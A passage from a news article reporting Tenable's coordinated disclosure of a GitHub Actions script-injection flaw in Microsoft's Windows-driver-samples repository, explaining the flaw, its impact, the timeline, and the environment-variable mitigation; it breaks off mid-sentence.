Tenable finds GitHub workflow flaw

GitHub Actions is supposed to be plumbing. It files labels, runs tests, tags owners, and generally stays out of sight. But the whole point of this Tenable finding is that the plumbing was reachable from the outside — and in Microsoft’s public Windows-driver-samples repository, that meant a normal GitHub issue could become code execution on the runner. Tenable disclosed the bug after Microsoft patched it, with the fix confirmed on March 30, 2026. ### What actually broke? A workflow in the repository’s `.github/workflows/tag-codeowner-on-issue.yml` file took the text of a GitHub issue body and pasted it directly into an inline Python script. That is the dangerous pattern. GitHub renders the `${{... }}` expression before the script runs, so untrusted user input becomes part of the program. Security researchers call this a script-injection risk. ### How could a random user exploit that? The issue body was wrapped in Python triple quotes. Tenable showed that an attacker could submit an issue containing its own triple quotes, break out of the string literal, and inject arbitrary Python code. No special repo access was needed beyond a regular GitHub account and the ability to open an issue and an execution path from public input straight into automation. ### Why is runner code execution a big deal? Because the runner is not just a scratch machine. Workflows often carry credentials, temporary tokens, API access, and permissions to act on the repository. Tenable said an attacker could exfiltrate secrets available to the workflow run and perform unauthorized operations on the target repository. GitHub is meant for automation but can still authenticate requests within the repo’s allowed permissions. ### Was this some obscure corner case? Not really. The repository is Microsoft’s public Windows driver samples repo — a well-known reference project with about 7,700 stars and 5,000 forks. That matters because sample repos are not just demos. Teams copy them, borrow workflow patterns from them, and sometimes build internal automation around them. Those mistakes don't just sit as a one-off bug. ### Didn’t GitHub already warn about this pattern? Yes — and that is part of the story. GitHub has been warning for years not to inject untrusted context values like issue bodies, PR titles, or comments directly into inline scripts. The safer pattern is to pass untrusted data through environment variables or another intermediary so the input stays safe. GitHub has published multiple guides on finding and preventing workflow injections. ### What did Microsoft and Tenable do? Tenable reported the issue to Microsoft on February 24, 2026. Microsoft confirmed the behavior on March 13, a pull request appeared in the repository, and Microsoft confirmed the fix on March 30. Tenable then published the advisory. That timeline matters because it shows a normal coordinated disclosure cycle, not an active public fight over the bug. ### So what is the real lesson here? Treat workflow files like internet-facing code. Basically, they